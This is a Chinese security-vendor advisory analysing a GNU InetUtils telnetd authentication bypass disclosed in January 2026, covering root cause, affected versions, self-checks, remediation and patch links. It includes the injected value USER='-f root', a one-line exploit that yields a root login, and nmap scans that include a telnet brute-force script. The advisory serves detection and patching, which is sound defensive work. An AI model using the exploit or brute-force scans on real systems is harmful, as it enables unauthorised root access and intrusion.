安多多云安全平台 · 技术文章

【POC已公开】GNU InetUtils telnetd 远程认证绕过漏洞深度分析

作者: 让天下没有难做的安全
【POC已公开】GNU InetUtils telnetd 远程认证绕过漏洞深度分析 作者:让天下没有难做的安全 发布时间:2026年1月21日 20:54 原文链接:微信公众号 点击↑蓝字关注我们,获取更多安全风险通告 漏洞编号:暂无CVE(QVD 2026 4408) 公开时间:2026 01 20 影响量级:万级 风险评级:严重(9.8分) 威胁类型:

【POC已公开】GNU InetUtils telnetd 远程认证绕过漏洞深度分析

作者:让天下没有难做的安全 | 发布时间:2026年1月21日 20:54

原文链接:微信公众号

点击↑蓝字关注我们,获取更多安全风险通告

漏洞编号:暂无CVE(QVD-2026-4408)

公开时间:2026-01-20

影响量级:万级

风险评级:严重(9.8分)

威胁类型:认证权限绕过

POC状态:已公开

EXP状态:已公开

在野利用:暂未发现

危害描述:远程攻击者无需任何密码,仅通过设置恶意环境变量,即可直接以 root 权限登录目标系统,完全绕过身份验证,实现对服务器的完全控制。

━━━━━━━━━━━━━━━━━━

01漏洞详情

影响组件

GNU InetUtils 是由 GNU 项目开发维护的开源网络工具套件,集成了传统的网络管理命令行工具,包括 

ftp

telnet

ping

rsh

 等常见客户端和服务端程序。

其中 

telnetd

 是 Telnet 服务守护进程,虽然在现代环境中 SSH 已成为主流,但在内网环境、老旧系统、嵌入式设备中,telnet 服务仍有大量使用。

漏洞原理

漏洞存在于 

telnetd

 调用 

/usr/bin/login

 的过程中。

问题根源:

telnetd

 服务端在处理来自客户端的 

USER

 环境变量时直接将该值作为参数传递给 

login

 程序。

在 

telnetd/telnetd.c

 中,调用 login 的模板如下:

/* 调用 login 程序的命令行模板 */

PATH_LOGIN " -p -h %h %?u{-f %u}{%U}"

当变量 

%U

 扩展时,会直接获取 

USER

 环境变量的值。如果攻击者设置:

USER='-f root'

最终执行的命令变成:

/usr/bin/login -p -h  -f root

login

 程序的 

-f

 参数会跳过密码验证,直接以指定用户身份登录。攻击者由此可以无需密码直接获得 root shell。

━━━━━━━━━━━━━━━━━━

02影响范围

受影响版本

GNU InetUtils >= 1.9.3 且 <= 2.7

该漏洞于 2015年3月19日 通过代码提交引入,并在 2015年5月12日 发布的 v1.9.3 版本中生效,已潜伏近 11 年。

默认安装受影响版本的主流发行版包括:

Debian 12 / 13

Ubuntu 24.04+

Kali Linux

Trisquel GNU/Linux

其他基于 Debian/Ubuntu 的发行版

━━━━━━━━━━━━━━━━━━

03为什么大多数环境不受影响

现代 Linux 发行版默认不会安装或启用 telnetd 服务,因此大多数云服务器和生产环境默认不受影响

NAS BusyBox 有自己的 telnetd 实现,不依赖 GNU InetUtils 的代码不受影响。

GNU InetUtils 的 telnetd 不是 Standalone Daemon,本身不具备监听端口能力,必须配合 inetd/xinetd/systemd socket 才能运行.

即使安装了 telnetd,还需要额外安装并配置 inetd/xinetd,并在配置文件中启用 telnet 服务。

默认不受影响的原因

原因

说明

telnetd 默认不安装

主流发行版默认不安装 

inetutils-telnetd

 包

inetd/xinetd 默认不启用

即使安装了 telnetd,还需要启用 inetd 或 xinetd 超级服务器运行

SSH 已成为标准

运维几乎全面采用 SSH,telnet 仅在特殊场景使用

云厂商默认配置

腾讯云、阿里云、AWS 等云服务器镜像默认不包含 telnetd

端口默认关闭

安全组/防火墙默认不开放 23 端口

哪些环境可能受影响

内网老旧系统:遗留的内网管理服务器、交换机管理接口

嵌入式/IoT 设备:路由器、NAS、工控设备等可能默认启用 telnet

开发测试环境:为了调试方便临时开启 telnet 后忘记关闭

容器/虚拟机模板:定制的系统镜像中可能包含 telnetd

大学/教育网络:教学环境可能使用 telnet 进行网络实验

━━━━━━━━━━━━━━━━━━

04资产测绘与搜索

本地自查命令

# 检查 telnetd 是否安装dpkg -l | grep -i telnetd

# 检查 telnetd 来源包apt show telnetd 2>/dev/null | grep -E "Source"

# 检查 telnet 端口是否监听netstat -tlnp | grep :23ss -tlnp | grep :23

# 检查 inetd 服务状态systemctl status inetutils-inetdsystemctl status xinetd

# 检查 inetd.conf 中的 telnet 配置grep -v "^#" /etc/inetd.conf | grep telnet

批量扫描(内网资产排查)

# 使用 nmap 扫描内网 telnet 服务nmap -p 23 --open 192.168.1.0/24

# 扫描并获取 banner 信息nmap -p 23 --script telnet-brute,banner 192.168.1.0/24

# 使用 masscan 快速扫描大范围masscan -p23 10.0.0.0/8 --rate=10000

━━━━━━━━━━━━━━━━━━

05漏洞复现

该漏洞的 POC 已完全公开,复现步骤极其简单:

环境搭建(以 Debian/Ubuntu 为例)

# 安装 telnetd 和 telnet 客户端sudo apt-get install inetutils-telnetd telnet

# 启用 telnet 服务sudo sed -i 's/## telnet/telnet/' /etc/inetd.conf

# 启动 inetd 服务sudo /etc/init.d/inetutils-inetd start

漏洞利用(一行命令)

# 设置恶意 USER 环境变量并连接USER='-f root' telnet -a localhost

━━━━━━━━━━━━━━━━━━

06处置建议

首要建议:禁用 telnetd

# Debian/Ubuntu 系统 - 停止并禁用服务sudo systemctl stop inetutils-inetdsudo systemctl disable inetutils-inetd

# 或直接卸载sudo apt remove inetutils-telnetd,如果业务确实需要远程访问强烈建议迁移至 SSH

安全更新

如必须使用 telnet,请应用官方补丁或更新至修复版本:

# Debian/Ubuntusudo apt update && sudo apt upgrade inetutils-telnetd

# RHEL/CentOS/Fedorasudo dnf update inetutils

# 或sudo yum update inetutils

# Arch Linuxsudo pacman -Syu inetutils

━━━━━━━━━━━━━━━━━━

07参考资料

原始安全公告:https://www.openwall.com/lists/oss-security/2026/01/20/2

官方补丁1:https://codeberg.org/inetutils/inetutils/commit/fd702c02497b2f398e739e3119bed0b23dd7aa7b

官方补丁2:https://codeberg.org/inetutils/inetutils/commit/ccba9f748aa8d50a38d7748e2e60362edd6a32cc

漏洞引入提交:https://codeberg.org/inetutils/inetutils/commit/fa3245ac8c288b87139a0da8249d0a408c4dfb87

━━━━━━━━━━━━━━━━━━

08时间线

日期

事件

2015-03-19

漏洞代码被引入

2015-05-12

随 v1.9.3 版本发布

2026-01-19

Kyu Neushwaistein 发现并报告漏洞

2026-01-20

Paul Eggert 发布初始补丁

2026-01-20

Simon Josefsson 发布安全公告

2026-01-21

安多多更新检测规则

━━━━━━━━━━━━━━━━━━

POC有更新,n8n 沙箱逃逸漏洞CVE-2026-0863仍有绕过可能

【安多多预警】AI工作流ComfyUI远程代码执行漏洞(CVE-2025-67303),附检测脚本

安多多-Wiz级多云安全平台,资产真实风险一张图看清,正式开放使用

  • 微信客服:anduoduo2025

PoC执行结果

构建纵深防御体系是个复杂的工程

安多多团队把资深的安全运营经验转为平台工具化,使用 AI+云方能防患未然

访问 https://www.anduoduo.net 即可直接使用